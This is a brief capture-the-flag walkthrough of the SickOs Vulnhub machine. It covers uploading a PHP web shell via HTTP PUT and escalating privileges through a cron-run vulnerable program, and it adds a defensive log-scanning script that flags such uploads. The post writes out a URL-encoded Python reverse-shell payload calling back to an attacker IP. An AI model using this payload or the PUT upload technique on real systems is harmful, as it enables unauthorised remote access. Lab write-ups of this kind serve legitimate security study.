Beyond Theory Computing

SickOs

Hei Hasbro September 23, 2019 1 min read

Vulnhub / Web / Curl / Cron

Another fun machine. Here we use the curl command to place a shell on the server. From there, you escalate privileges through a vulnerable application run from Cron.

Using curl, we can see which HTTP methods the server allows. Look at the “Allow: PUT” option in the response: it lets us PUT content onto the server.

curl -v -X OPTIONS IP/Options_Folder

Below we test the upload to see if it worked. We successfully placed a shell that runs commands through the PHP system call.

Take note of the IP: change the shell to point to your own IP for the callback.

http://192.168.233.147/test/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%22192.168.233.146%22,443%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27
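Seen from the defender's side, the PUT upload and the follow-up request to the uploaded script leave a clear trail in the web access log. The following is an added example, not part of the original post: it scans Combined Log Format lines for that pattern. The log lines, the function name and the extension list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined Log Format: client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx", ".cgi", ".pl", ".py")
WRITE_OK = {"200", "201", "204"}  # statuses a server returns for an accepted PUT

# Constructed sample log lines (not taken from the original post).
SAMPLE_LOG = """\
192.168.233.146 - - [23/Sep/2019:10:01:02 +0000] "OPTIONS /test/ HTTP/1.1" 200 0
192.168.233.146 - - [23/Sep/2019:10:01:40 +0000] "PUT /test/notes.txt HTTP/1.1" 201 0
192.168.233.146 - - [23/Sep/2019:10:02:11 +0000] "PUT /test/shell.php HTTP/1.1" 201 0
192.168.233.10 - - [23/Sep/2019:10:02:30 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512
192.168.233.146 - - [23/Sep/2019:10:03:05 +0000] "GET /test/shell.php?cmd=id HTTP/1.1" 200 54
192.168.233.146 - - [23/Sep/2019:10:03:50 +0000] "PUT /admin/x.php HTTP/1.1" 405 0
"""

def find_put_webshells(log_text):
    """Return findings: script uploads via PUT, and later requests to them."""
    uploaded = {}   # path -> IP that uploaded it
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = unquote(urlsplit(m["target"]).path)
        if m["method"] == "PUT" and m["status"] in WRITE_OK:
            if path.lower().endswith(SCRIPT_EXT):
                uploaded[path] = m["ip"]
                findings.append(("script-upload", m["ip"], path, m["ts"]))
        elif path in uploaded and m["status"].startswith("2"):
            # A successful request to a PUT-created script means it was executed.
            findings.append(("uploaded-script-executed", m["ip"], path, m["ts"]))
    return findings

if __name__ == "__main__":
    for finding in find_put_webshells(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

The rejected PUT (405) and the plain-text upload are deliberately not flagged; only accepted uploads of server-side script types, and later hits on them, are reported.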

After obtaining a shell, enumerate the system for privilege escalation points. You can use g0tmi1k’s guide, found here: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

We now use printf to place a one-liner into the update file, which will be called by Cron, according to EDB @ https://www.exploit-db.com/exploits/33899

Tags: SickOs Vulnhub
